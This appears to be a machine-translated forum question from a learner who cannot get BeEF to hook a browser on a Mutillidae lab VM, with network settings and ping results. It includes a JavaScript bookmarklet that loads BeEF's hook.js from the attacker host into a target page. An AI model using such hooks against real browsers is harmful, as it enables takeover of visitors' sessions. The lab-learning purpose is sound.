Sto leggendo "Practical Web Penetration Testing". Sto usando VirtualBox per eseguire due VM: Windows 7 con Mutillidae e KaliLinux dove voglio usare Beef. Entrambi sono collegati a una rete Nat 10.0.2.0/24.
Come si dice nel libro, ho impostato KaliLinux per avere un IP statico modificando /etc/network/interfaces
:
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
#Static IP Address
auto eth0
iface eth0 inet static
address 10.0.2.99
netmask 255.255.255.0
network 10.0.2.0
broadcast 10.0.2.255
gateway 10.0.2.1
La mia VM Windows ha IP 10.0.2.4.
Ora sto provando a preparare manzo. Quando apro una scheda su ciascuno di questi browser VM su http://10.0.2.99:3000/demos/basic.html
, effettivamente ottengo i browser agganciati come browser online nel pannello dell'interfaccia utente di manzo.
Ma voglio avere un gancio su Mutillidae. C'è un pulsante per farlo copiare come un segnalibro per aggiungere il file hook.js per una determinata pagina web:
javascript: (function () { var url = 'http://10.0.2.99:3000/hook.js';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();
Quando lo eseguo su entrambi i browser delle VM, aperto su http://10.0.2.4/mutillidae/index.php
, non funziona. Il file hook.js
viene caricato, posso vederlo su firebug. Ma il browser non viene mai "agganciato": non riesco a vederlo sul pannello di manzo.
Ho persino modificato questa porzione di /etc/beef-xss/config.yaml
:
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
# set the public hostname and port here
public: "10.0.2.99" # public hostname/IP address
#public_port: "" # experimental
E fatto qualche ricerca ma niente ...
Alcune cose strane (o è normale?):
Da Kali 10.0.2.99
ping 10.0.2.99 - OK
ping 10.0.2.4 - KO --> But I can access 10.0.2.4/mutillidae/ !
ping 10.0.2.1 - OK
ping 10.0.2.0 -b - KO --> shouldn't I get answers from myself and gateway at least?
Da W7 10.0.2.4
ping 10.0.2.99 - OK --> So it works in that direction but not in the other? And I can access beef's panel, demo, or hook.js
ping 10.0.2.4 - OK
ping 10.0.2.1 - OK
ping 10.0.2.0 - KO --> Reply from 10.0.2.4: Destination host unreachable. Is this why Kali can't access W7?
Perché non posso configurare un hook su Mutillidae su Win7 VM connesso alla stessa rete Nat di Kali VM che esegue manzo?
Grazie.
Se hai bisogno di ulteriori dettagli per aiutarmi, non esitare. Modificherò la mia domanda per aiutarti ad aiutarmi.